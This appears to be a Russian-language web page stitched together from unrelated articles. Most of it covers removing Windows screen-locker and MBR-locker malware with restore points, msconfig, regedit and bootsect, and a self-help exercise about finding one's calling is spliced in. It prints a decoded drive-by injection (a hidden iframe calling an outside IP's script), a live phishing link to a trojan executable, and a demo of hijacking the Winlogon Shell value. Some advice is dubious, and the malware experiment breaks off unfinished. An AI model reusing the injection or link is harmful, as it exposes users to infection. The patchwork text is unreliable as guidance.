Речь пойдет о простейших способах нейтрализации вирусов, в частности, блокирующих рабочий стол пользователя Windows 7 (семейство вирусов Trojan.Winlock). Подобные вирусы отличаются тем, что не скрывают своего присутствия в системе, а наоборот, демонстрируют его, максимально затрудняя выполнение каких-либо действий, кроме ввода специального "кода разблокировки", для получения которого, якобы, требуется перечислить некоторую сумму злоумышленникам через отправку СМС или пополнение счета мобильного телефона через платежный терминал. Цель здесь одна - заставить пользователя платить, причем иногда довольно приличные деньги. На экран выводится окно с грозным предупреждением о блокировке компьютера за использование нелицензионного программного обеспечения или посещение нежелательных сайтов, и еще что-то в этом роде, как правило, чтобы напугать пользователя. Кроме этого, вирус не позволяет выполнить какие либо действия в рабочей среде Windows - блокирует нажатие специальных комбинаций клавиш для вызова меню кнопки "Пуск", команды "Выполнить" , диспетчера задач и т.п. Указатель мышки невозможно переместить за пределы окна вируса. Как правило, эта же картина наблюдается и при загрузке Windows в безопасном режиме. Ситуация кажется безвыходной, особенно если нет другого компьютера, возможности загрузки в другой операционной системе, или со сменного носителя (LIVE CD, ERD Commander, антивирусный сканер). Но, тем не менее, выход в подавляющем большинстве случаев есть.
Новые технологии, реализованные в Windows Vista / Windows 7 значительно затруднили внедрение и взятие системы под полный контроль вредоносными программами, а также предоставили пользователям дополнительные возможности относительно просто от них избавиться, даже не имея антивирусного программного обеспечения (ПО). Речь идет о возможности загрузки системы в безопасном режиме с поддержкой командной строки и запуска из нее программных средств контроля и восстановления. Очевидно, по привычке, из-за довольно убогой реализации этого режима в предшествующих версиях операционных систем семейства Windows, многие пользователи просто им не пользуются. А зря. В командной строке Windows 7 нет привычного рабочего стола (который может быть заблокирован вирусом), но есть возможность запустить большинство программ - редактор реестра, диспетчер задач, утилиту восстановления системы и т.п.
Удаление вируса с помощью отката системы на точку восстановления
Вирус - это обычная программа, и если даже она находится на жестком диске компьютера, но не имеет возможности автоматически стартовать при загрузке системы и регистрации пользователя, то она так же безобидна, как, например, обычный текстовый файл. Если решить проблему блокировки автоматического запуска вредоносной программы, то задачу избавления от вредоносного ПО можно считать выполненной. Основной способ автоматического запуска, используемый вирусами - это специально созданные записи в реестре, создаваемые при внедрении в систему. Если удалить эти записи - вирус можно считать обезвреженным. Самый простой способ - это выполнить восстановление системы по данным контрольной точки. Контрольная точка - это копия важных системных файлов, хранящаяся в специальном каталоге ("System Volume Information") и содержащих, кроме всего прочего, копии файлов системного реестра Windows. Выполнение отката системы на точку восстановления, дата создания которой предшествует вирусному заражению, позволяет получить состояние системного реестра без тех записей, которые сделаны внедрившимся вирусом и тем самым, исключить его автоматический старт, т.е. избавиться от заражения даже без использования антивирусного ПО. Таким способом можно просто и быстро избавиться от заражения системы большинством вирусов, в том числе и тех, что выполняют блокировку рабочего стола Windows. Естественно, вирус-блокировщик, использующий например, модификацию загрузочных секторов жесткого диска (вирус MBRLock) таким способом удален быть не может, поскольку откат системы на точку восстановления не затрагивает загрузочные записи дисков, да и загрузить Windows в безопасном режиме с поддержкой командной строки не удастся, поскольку вирус загружается еще до загрузчика Windows . Для избавления от такого заражения придется выполнять загрузку с другого носителя и восстанавливать зараженные загрузочные записи. Но подобных вирусов относительно немного и в большинстве случаев, избавиться от заразы можно откатом системы на точку восстановления.
1. В самом начале загрузки нажать кнопку F8 . На экране отобразится меню загрузчика Windows, с возможными вариантами загрузки системы
2. Выбрать вариант загрузки Windows - "Безопасный режим с поддержкой командной строки"
После завершения загрузки и регистрации пользователя вместо привычного рабочего стола Windows, будет отображаться окно командного процессора cmd.exe
3. Запустить средство "Восстановление системы", для чего в командной строке нужно набрать rstrui.exe и нажать ENTER .
Переключить режим на "Выбрать другую точку восстановления" и в следующем окне установить галочку "Показать другие точки восстановления"
После выбора точки восстановления Windows, можно посмотреть список затрагиваемых программ при откате системы:
Список затрагиваемых программ, - это список программ, которые были установлены после создания точки восстановления системы и которые могут потребовать переустановки, поскольку в реестре будут отсутствовать связанные с ними записи.
После нажатия на кнопку "Готово" начнется процесс восстановления системы. По его завершению будет выполнена перезагрузка Windows.
После перезагрузки, на экран будет выведено сообщение об успешном или неуспешном результате выполнения отката и, в случае успеха, Windows вернется к тому состоянию, которое соответствовало дате создания точки восстановления. Если блокировка рабочего стола не прекратится, можно воспользоваться более продвинутым способом, представленным ниже.
Удаление вируса без отката системы на точку восстановления
Возможна ситуация, когда в системе отсутствуют, по разным причинам, данные точек восстановления, процедура восстановления завершилась с ошибкой, или откат не дал положительного результата. В таком случае, можно воспользоваться диагностической утилитой Конфигурирования системы MSCONFIG.EXE . Как и в предыдущем случае, нужно выполнить загрузку Windows в безопасном режиме с поддержкой командной строки и в окне интерпретатора командной строки cmd.exe набрать msconfig.exe и нажать ENTER
На вкладке "Общие" можно выбрать следующие режимы запуска Windows:
Обычный запуск
- обычная загрузка системы.
Диагностический запуск
- при загрузке системы будет выполнен запуск только минимально необходимых системных служб и пользовательских программ.
Выборочный запуск
- позволяет задать в ручном режиме перечень системных служб и программ пользователя, которые будут запущены в процессе загрузки.
Для устранения вируса наиболее просто воспользоваться диагностическим запуском, когда утилита сама определит набор автоматически запускающихся программ. Если в таком режиме блокировка рабочего стола вирусом прекратится, то нужно перейти к следующему этапу - определить, какая же из программ является вирусом. Для этого можно воспользоваться режимом выборочного запуска, позволяющим включать или выключать запуск отдельных программ в ручном режиме.
Вкладка "Службы" позволяет включить или выключить запуск системных служб, в настройках которых установлен тип запуска "Автоматически" . Снятая галочка перед названием службы означает, что она не будет запущена в процессе загрузки системы. В нижней части окна утилиты MSCONFIG имеется поле для установки режима "Не отображать службы Майкрософт" , при включении которого будут отображаться только службы сторонних производителей.
Замечу, что вероятность заражения системы вирусом, который инсталлирован в качестве системной службы, при стандартных настройках безопасности в среде Windows Vista / Windows 7, очень невелика, и следы вируса придется искать в списке автоматически запускающихся программ пользователей (вкладка "Автозагрузка").
Так же, как и на вкладке "Службы", можно включить или выключить автоматический запуск любой программы, присутствующей в списке, отображаемом MSCONFIG. Если вирус активизируется в системе путем автоматического запуска с использованием специальных ключей реестра или содержимого папки "Автозагрузка", то c помощью msconfig можно не только обезвредить его, но и определить путь и имя зараженного файла.
Утилита msconfig является простым и удобным средством конфигурирования автоматического запуска служб и приложений, которые запускаются стандартным образом для операционных систем семейства Windows. Однако, авторы вирусов нередко используют приемы, позволяющие запускать вредоносные программы без использования стандартных точек автозапуска. Избавиться от такого вируса с большой долей вероятности можно описанным выше способом отката системы на точку восстановления. Если же откат невозможен и использование msconfig не привело к положительному результату, можно воспользоваться прямым редактированием реестра.
В процессе борьбы с вирусом пользователю нередко приходится выполнять жесткую перезагрузку сбросом (Reset) или выключением питания. Это может привести к ситуации, когда загрузка системы начинается нормально, но не доходит до регистрации пользователя. Компьютер "висит" из-за нарушения логической структуры данных в некоторых системных файлах, возникающей при некорректном завершении работы. Для решения проблемы так же, как и в предыдущих случаях, можно загрузиться в безопасном режиме с поддержкой командной строки и выполнить команду проверки системного диска
chkdsk C: /F - выполнить проверку диска C: с исправлением обнаруженных ошибок (ключ /F)
Поскольку на момент запуска chkdsk системный диск занят системными службами и приложениями, программа chkdsk не может получить к нему монопольный доступ для выполнения тестирования. Поэтому пользователю будет выдано сообщение с предупреждением и запрос на выполнение тестирования при следующей перезагрузке системы. После ответа Y в реестр будет занесена информация, обеспечивающая запуск проверки диска при перезагрузке Windows. После выполнения проверки, эта информация удаляется и выполняется обычная перезагрузка Windows без вмешательства пользователя.
Устранение возможности запуска вируса с помощью редактора реестра.
Для запуска редактора реестра, как и в предыдущем случае, нужно выполнить загрузку Windows в безопасном режиме с поддержкой командной строки, в окне интерпретатора командной строки набрать regedit.exe и нажать ENTER Windows 7, при стандартных настройках безопасности системы, защищена от многих методов запуска вредоносных программ, применявшихся для предыдущих версий операционных систем от Майкрософт. Установка вирусами своих драйверов и служб, перенастройка службы WINLOGON с подключением собственных исполняемых модулей, исправление ключей реестра, имеющих отношение ко всем пользователям и т.п - все эти методы в среде Windows 7 либо не работают, либо требуют настолько серьезных трудозатрат, что практически не встречаются. Как правило, изменения в реестре, обеспечивающие запуск вируса, выполняются только в контексте разрешений, существующих для текущего пользователя, т.е. в разделе HKEY_CURRENT_USER
Для того, чтобы продемонстрировать простейший механизм блокировки рабочего стола с использованием подмены оболочки пользователя (shell) и невозможности использования утилиты MSCONFIG для обнаружения и удаления вируса можно провести следующий эксперимент - вместо вируса самостоятельно подправить данные реестра, чтобы вместо рабочего стола получить, например, командную строку. Привычный рабочий стол создается проводником Windows (программа Explorer.exe ) запускаемым в качестве оболочки пользователя. Это обеспечивается значениями параметра Shell в разделах реестра
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
- для всех пользователей.
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
- для текущего пользователя.
Параметр Shell представляет собой строку с именем программы, которая будет использоваться в качестве оболочки при входе пользователя в систему. Обычно в разделе для текущего пользователя (HKEY_CURRENT_USER или сокращенно - HKCU) параметр Shell отсутствует и используется значение из раздела реестра для всех пользователей (HKEY_LOCAL_MACHINE\ или в сокращенном виде - HKLM)
Так выглядит раздел реестра HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon при стандартной установке Windows 7
Если же в данный раздел добавить строковый параметр Shell принимающий значение "cmd.exe", то при следующем входе текущего пользователя в систему вместо стандартной оболочки пользователя на основе проводника будет запущена оболочка cmd.exe и вместо привычного рабочего стола Windows, будет отображаться окно командной строки.
Естественно, подобным образом может быть запущена любая вредоносная программа и пользователь получит вместо рабочего стола порнобаннер, блокировщик и прочую гадость.
Для внесения изменений в раздел для всех пользователей (HKLM. . .) требуется наличие административных привилегий, поэтому вирусные программы, как правило модифицируют параметры раздела реестра текущего пользователя (HKCU . . .)
Если, в продолжение эксперимента, запустить утилиту msconfig , то можно убедиться, что в списках автоматически запускаемых программ cmd.exe в качестве оболочки пользователя отсутствует. Откат системы, естественно, позволит вернуть исходное состояние реестра и избавиться от автоматического старта вируса, но если он по каким-либо причинам, невозможен - остается только прямое редактирование реестра. Для возврата к стандартному рабочему столу достаточно удалить параметр Shell , или изменить его значение с "cmd.exe" на "explorer.exe" и выполнить перерегистрацию пользователя (выйти из системы и снова войти) или перезагрузку. Редактирование реестра можно выполнить, запустив из командной строки редактор реестра regedit.exe или воспользоваться консольной утилитой REG.EXE . Пример командной строки для удаления параметра Shell:
REG delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell
Приведенный пример с подменой оболочки пользователя, на сегодняшний день является одним из наиболее распространенных приемов, используемых вирусами в среде операционной системы Windows 7 . Довольно высокий уровень безопасности при стандартных настройках системы не позволяет вредоносным программам получать доступ к разделам реестра, которые использовались для заражения в Windows XP и более ранних версий. Даже если текущий пользователь является членом группы "Администраторы", доступ к подавляющему количеству параметров реестра, используемых для заражения, требует запуск программы от имени администратора. Именно по этой причине вредоносные программы модифицируют ключи реестра, доступ к которым разрешен текущему пользователю (раздел HKCU . . .) Второй важный фактор - сложность реализации записи файлов программ в системные каталоги. Именно по этой причине большинство вирусов в среде Windows 7 используют запуск исполняемых файлов (.exe) из каталога временных файлов (Temp) текущего пользователя. При анализе точек автоматического запуска программ в реестре, в первую очередь нужно обращать внимание на программы, находящиеся в каталоге временных файлов. Обычно это каталог C:\USERS\имя пользователя\AppData\Local\Temp . Точный путь каталога временных файлов можно посмотреть через панель управления в свойствах системы - "Переменные среды". Или в командной строке:
set temp
или
echo %temp%
Кроме того, поиск в реестре по строке соответствующей имени каталога для временных файлов или переменной %TEMP% можно использовать в качестве дополнительного средства для обнаружения вирусов. Легальные программы никогда не выполняют автоматический запуск из каталога TEMP.
Для получения полного списка возможных точек автоматического запуска удобно использовать специальную программу Autoruns из пакета SysinternalsSuite.
Простейшие способы удаления блокировщиков семейства MBRLock
Вредоносные программы могут получить контроль над компьютером не только при заражении операционной системы, но и при модификации записей загрузочных секторов диска, с которого выполняется загрузка. Вирус выполняет подмену данных загрузочного сектора активного раздела своим программным кодом так, чтобы вместо Windows выполнялась загрузка простой программы, которая бы выводила на экран сообщение вымогателя, требующее денег для жуликов. Поскольку вирус получает управление еще до загрузки системы, обойти его можно только одним способом - загрузиться с другого носителя (CD/DVD, внешнего диска, и т.п.) в любой операционной системе, где имеется возможность восстановления программного кода загрузочных секторов. Самый простой способ - воспользоваться Live CD / Live USB, как правило, бесплатно предоставляемыми пользователям большинством антивирусных компаний (Dr Web Live CD, Kaspersky Rescue Disk, Avast! Rescue Disk и т.п.) Кроме восстановления загрузочных секторов, данные продукты могут выполнить еще и проверку файловой системы на наличие вредоносных программ с удалением или лечением зараженных файлов. Если нет возможности использовать данный способ, то можно обойтись и простой загрузкой любой версии Windows PE (установочный диск, диск аварийного восстановления ERD Commander), позволяющей восстановить нормальную загрузку системы. Обычно достаточно даже простой возможности получить доступ к командной строке и выполнить команду:
bootsect /nt60 /mbr буква системного диска:
bootsect /nt60 /mbr E:> - восстановить загрузочные секторы диска E: Здесь должна быть буква того диска, который используется в качестве устройства загрузки поврежденной вирусом системы.
Или для Windows, предшествующих Windows Vista
bootsect /nt52 /mbr буква системного диска:
Утилита bootsect.exe может находиться не только в системных каталогах, но и на любом съемном носителе, может выполняться в среде любой операционной системы семейства Windows и позволяет восстановить программный код загрузочных секторов, не затрагивая таблицу разделов и файловую систему. Ключ /mbr, как правило, не нужен, поскольку восстанавливает программный код главной загрузочной записи MBR, которую вирусы не модифицируют (возможно - пока не модифицируют).
Вирусы-шифровальщики и новые проблемы спасения пользовательских данных.
Кроме блокировки компьютера, вирусы вымогатели ипользуют шифрование пользовательских файлов, потеря которых может иметь серьезные последствия, и для восстановления которых жертва готова заплатить. Подобные вирусы-шифровальщики, как правило, используют серьезные технологии шифрования данных, делающие невозможным восстановление информации без ключей шифрования, которые злоумышленники предлагают купить за довольно крупные суммы. Правда, гарантий никаких. И здесь у пострадавшего есть несколько вариантов - забыть о своих данных навсегда, заплатить вымогателям без гарантии восстановления или обратиться к профессионалам, занимающимся восстановлением. Можно восстановить данные самостоятельно, если у вас достаточно знаний и навыков, либо потеря данныж не столь значима при неудаче. Полное восстановление всего и вся не получится, но при некотором везении, значительную часть информации можно вернуть. Некоторые примеры:
Восстановление данных из теневых копий томов - о теневом копировании и возможности восстановления файлов из теневых копий томов.
Recuva - использоваие бесплатной программы Recuva от Piriform для восстановления удаленных файлов, и файлов из теневых копий томов.
С появлением вирусов шифровальщиков нового поколения, проблема сохранности пользовательских данных стала значительно острее. Вирусы не только выполняют шифрование документов, архивов, фото, видео и прочих файлов, но и делают все возможное, чтобы не допустить хотя бы частичное восстановление данных пострадавшим от заражения пользователем. Так, например, вирусы-шифровальщики выполняют попытку удаления теневых копий томов с помощью команды vssadmin , что при отключенном контроле учетных записей (UAC), происходит незаметно и гарантированно приводит к невозможности восстановления предыдущих копий файлов или использования программного обеспечения, позволяющего извлекать данные из теневых копий (Recuva, стандартные средства Windows и т.п.). С учетом применения алгоритмов стойкого шифрования, восстановление зашифрованных данных, даже частичное, становится очень непростой задачей, посильной разве что для профессионалам в данной области. На сегодняшний день, существует пожалуй единственный способ обезопасить себя от полной потери данных - это использовать автоматическое резервное копирование с хранением копий в недоступном для вирусов месте или использовать программное обеспечения типа "машина времени", позволяющее создавать мгновенные копии файловой системы (снимки) и выполнять откат на их содержимое в любой момент времени. Такое программное обеспечение не использует стандартную файловую систему, имеет свой собственный загрузчик и средства управления, работающие автономно, без необходимости загрузки Windows, что не позволяет вредоносным программам полностью взять под контроль средства восстановления файловой системы. Кроме того, это ПО практически не влияет на быстродействие Windows. Примером такого ПО могут быть некоторые коммерческие продукты компании Horizon DataSys и бесплатные Comodo Time Machine и Rollback RX Home
Comodo Time Machine - отдельная статья о Comodo Time Machine и ссылки для скачивания бесплатной версии.
Rollback Rx Home - отдельная статья о Rollback Rx Home Edition компании Horizon DataSys и ссылки для скачивания бесплатной версии.
Инструкция
Regedit - это встроенный в операционную систему редактор реестра. Название является сокращением от фразы Registry edit. Эта программа служит для систематизации всех ключей реестра, их создания, а также удаления. При удалении программы необходимо очищать реестр от ненужных ключей, которые ранее были использованы средствами операционной системы.
Перед редактированием файлов реестра необходимо удалить папку с программой. Откройте каталог Program Files, выберите нужную директорию и нажмите клавишу Delete для перемещения в «Корзину» либо Shift + Delete для полного удаления с жесткого диска.
Стоит сказать, что редактирование файлов реестра новичком - дело опасное, поэтому лучше создать резервную копию. Нажмите верхнее меню «Файл» и выберите пункт «Экспорт». В открывшемся окне поставьте отметку напротив строки «Весь реестр», введите название файла и нажмите кнопку «Сохранить».
Экспорт файлов реестра можно осуществлять посредством командной строки. Запуск командной строки обычно производится через меню «Пуск», раздел «Стандартные программы». В окне необходимо ввести команду regedit /E d:export.reg и нажать Enter. Данной командой вы копируете файл реестра export.reg в корневой каталог диска «D:».
Для поиска ключей, оставленных самой программой, необходимо нажать верхнее меню «Правка» и выбрать пункт «Найти». В появившемся окне введите название программы или компании, которая занимается ее распространением. Нажмите клавишу Enter или F2 для начала операции поиска.
Найденные ключи можно удалить, выделив и нажав клавишу Delete. Затем нужно закрыть редактор реестра и перезагрузить компьютер. Теперь ваш компьютер чист от удаленной программы.
Надоедает ли пчеле делать одно и то же? Сложно представить, чтобы пчела вдруг занялась заготовлением орехов, словно белка. В природе все сбалансировано. Когда человек занят любимым делом, он похож на пчелу. Ему не надоедает. Он годами оттачивает навыки. Нас бы удивило, если бы известный футболист без особых причин оставил футбол и занялся продажей чего-нибудь. Зачем ему это? Как же найти свое дело, в котором можно полностью реализоваться? Применим фантастический подход.
Инструкция
Запишите три вещи, которые вы взяли бы с собой на необитаемый остров. Там всегда тепло, так что об одежде заботиться не придется. Там много фруктовых деревьев, так что разнообразной пищей вы обеспечены. Никто не потребует оплачивать счета, вы свободны ото всего. Никто не приезжает к вам в гости без разрешения. Рядом находится остров, на котором проживают цивилизованные племена. Они знают ваш язык. Вы можете приезжать к ним в любое . Вам предстоит прожить на своем острове 20 лет. Какие же три вещи вы туда возьмете? Думайте , потом будет поздно. Вернетесь только 20 лет. Все необходимое для этих трех вещей на острове будет, а больше ничего.
Какую из этих трех вещей вам захочется привезти на соседний обитаемый остров или показать , которых пригласите на ваш остров? С какой вы им покажете эту вещь или результаты ее использования? Помните, что ни в пище, ни в одежде, ни в деньгах вы не нуждаетесь.
Видео по теме
Обратите внимание
Бывает трудно мечтать, потому что мы привыкли находиться в ограничивающих рамках. За один раз может не получиться. Не оставляйте мыслей о вашем острове. Выделите целый день, уйдите куда-нибудь и прорабатывайте варианты фантастической жизни.
Важно попробовать то, что вы представили. Сделайте что-нибудь, не думая о деньгах. Прибыль часто приходит к людям, увлеченным одной идеей.
Источники:
- Премьер-министр поздравил тех, кто занимается любимым делом
Бывают случаи, когда полностью просканировав систему на вирусы и удалив их, после перезагрузки компьютера они появляются опять. При этом никаких носителей информации к ПК не подключалось и соединения с интернетом также не было. Возникает вопрос, а откуда же мог взяться этот вирус? Вероятнее всего, он может срабатывать с операционной системы. В таком случае обычного сканирования компьютера будет недостаточно. Потребуются дополнительные методы, которые позволят решить проблему.
Вам понадобится
- Компьютер, антивирусная программы ESET NOD32
Инструкция
В самом реестре вирусов быть не может. Но в параметрах реестра, которые отвечают за автозагрузку приложений, может быть ссылка на вредоносную программу или . Прежде чем начать процесс очистки, нужно установить дополнительные параметры, которые помогут обнаружить и решить проблему.
Дальнейшие инструкции по удалению вредоносных ссылок и ключей будут приведены на примере антивирусной программы ESET NOD32. Войдите в меню антивируса. Сделать это можно просто дважды щелкнув мышкой по значку программы на панели задач операционной системы. В меню программы выберите параметр «Сканирование». В окне появятся возможные варианты сканирования компьютера, из которых выберите «Выборочное сканирование».
Самая верхняя строка называется «Профиль сканирования». Нажмите по стрелочке возле этой строки. Откроются названия профилей сканирования. Среди них выберите «Интеллектуальное сканирование». Такой метод позволит более детально проверить неизвестные файлы.
Следующая строка называется «Объекты сканирования». Отметьте полностью все объекты, которые будут в этом окне, включая даже оперативную память и виртуальные приводы. Снизу в этом окне есть также параметр «Настройка». Нажмите по нему левой клавишей мышки и в появившемся окне выберите вкладку «Методы». В следующем окне отметьте полностью все пункты галочками, после чего нажмите ОК.
Теперь, когда все параметры работы антивирусной программы заданы, нажмите «Сканировать». Дождитесь завершения процесса. Если антивирусом будут обнаружены потенциально опасные программы или ссылки, они будут удалены автоматически. После завершения сканирования перезагрузите компьютер.
Источники:
- вирус реестр
Системный реестр операционной системы Windows любой версии - один из главных инструментов управления компьютером. Стандартным инструментом для работы с реестром является утилита regedit.exe.
Инструкция
Получите доступ к главному инструменту управления системным реестром Windows. Для этого вызовите главное меню, нажав кнопку «Пуск», и перейдите в диалог «Выполнить». Напечатайте gpedit.msc в строке «Открыть» и подтвердите запуск утилиты редактора групповых политик, нажав кнопку OK. Раскройте ссылку «Конфигурация пользователя» и перейдите в раздел «Административные шаблоны». Разверните узел «Система» двойным кликом мыши и откройте политику «Сделать недоступными средства редактирования реестра» также двойным кликом. Примените флажок в строке «Не задан» и сохраните сделанные изменения, нажав кнопку «Применить». Подтвердите выполнение выбранного действия, нажав кнопку OK.
Запустите инструмент «Редактор реестра». Для этого снова вернитесь в главное меню «Пуск» и еще раз перейдите в диалог «Выполнить». Напечатайте regedit в строке «Открыть» и подтвердите запуск утилиты, нажав кнопку OK.
Используйте стандартный механизм поиска нужного файла системного реестра. Для этого воспользуйтесь командой «Найти» в меню утилиты regedit.exe. Обратите внимание на то, что при вызове контекстного меню любого ключа реестра кликом правой кнопки мыши также становятся доступными опции:- развернуть;- создать;- найти;- удалить;- переименовать.
Ознакомьтесь со структурой корневых разделов реестра для облегчения поиска нужного файла :- HKEY_CLASSES_ROOT, или HKCR - ассоциации приложений и файловых расширений;- HKEY_CURRENT_USER, или HKCU - параметры настроек текущего пользователя;- HKEY_LOCAL_MACHINE, или HKLM - общая конфигурация системы;- HKEY_USERS, или HKU - параметры настроек всех пользователей;- HKEY_CURRENT_CONFIG, или HKCC - настройки данного аппаратного профиля.Последняя ветвь - не полноценный раздел системного реестра, а является ссылкой на раздел профилей в HKLM.
Что делать, если антивирус не справился со своей работой.Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или... много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус - это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) - гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами - не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.
Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден - должна быть запущена какая-то программа. Идеально - с административными правами, желательно - без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. - большинство грамотных пользователей данную опцию отключили навсегда.
Для отключения функций автозапуска в Windows XP/2000 reg-файл для импорта в реестр.
Для Windows 7 и более поздних отключение автозапуска можно выполнить с использованием апплета "Автозапуск" панели управления. В этом случае отключение действует по отношению к текущему пользователю. Более надежным способом защиты от внедрения вирусов, переносимых на съемных устройствах, является блокировка автозапуска для всех пользователей с помощью групповых политик:
Но основным "поставщиком" вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение - "Обозреватель Интернета" (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс - интерпретатор данных, полученных извне. Другими словами, - в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать "сайты для взрослых", сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами "скачать бесплатно" и " скачать без регистрации и SMS". Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы.
Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR"ом, а изменения в реестре отменены PT Startup Monitor"ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:
iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"
Означающий выполнение CGI-сценария сервера с IP - адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат - вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега "iframe" сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.
В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами - так называемые руткит (rootkit) - технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.
Удаление "качественного" вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами - вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, - все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.
Развитие антивирусов тоже не стоит на месте, - они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет "не по зубам" любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса - это работа, которую рано или поздно придется выполнять любому пользователю компьютера.
Здравствуйте.
Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
наш фирменный бланк резюме и отправить его по адресу [email protected]
Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
позвоним Вам в течение нескольких дней. Не забудьте
указать телефон, а также позицию, на которую Вы претендуете. Желательно
также указать пожелания по окладу.
Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
http://verano-konwektor.pl/resume.exe
Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.
Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего,
получите
троянскую программу на свой компьютер.
Скачиваю файл resume.exe. Размер - 159744 байта. Пока не запускаю.
Копирую
файл на другие компьютеры, где установлены различные антивирусы - просто для
очередной проверки их эффективности. Результаты не ахти - антивирус Avast 4.8
Home Edition деликатно промолчал. Подсунул его Symantec"у - та же реакция.
Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле,
не зря набирает популярность.
Все эксперименты выполняю на виртуальной машине с операционной системой
Windows XP. Учетная запись с правами администратора, поскольку, чаще всего
вирусы успешно внедряются в систему только, если пользователь является
локальным администратором.
Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал
свое черное дело.
Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка.
На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP.
Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) - надо же
оставить вирусу хоть какую-то возможность проявить свою активность.
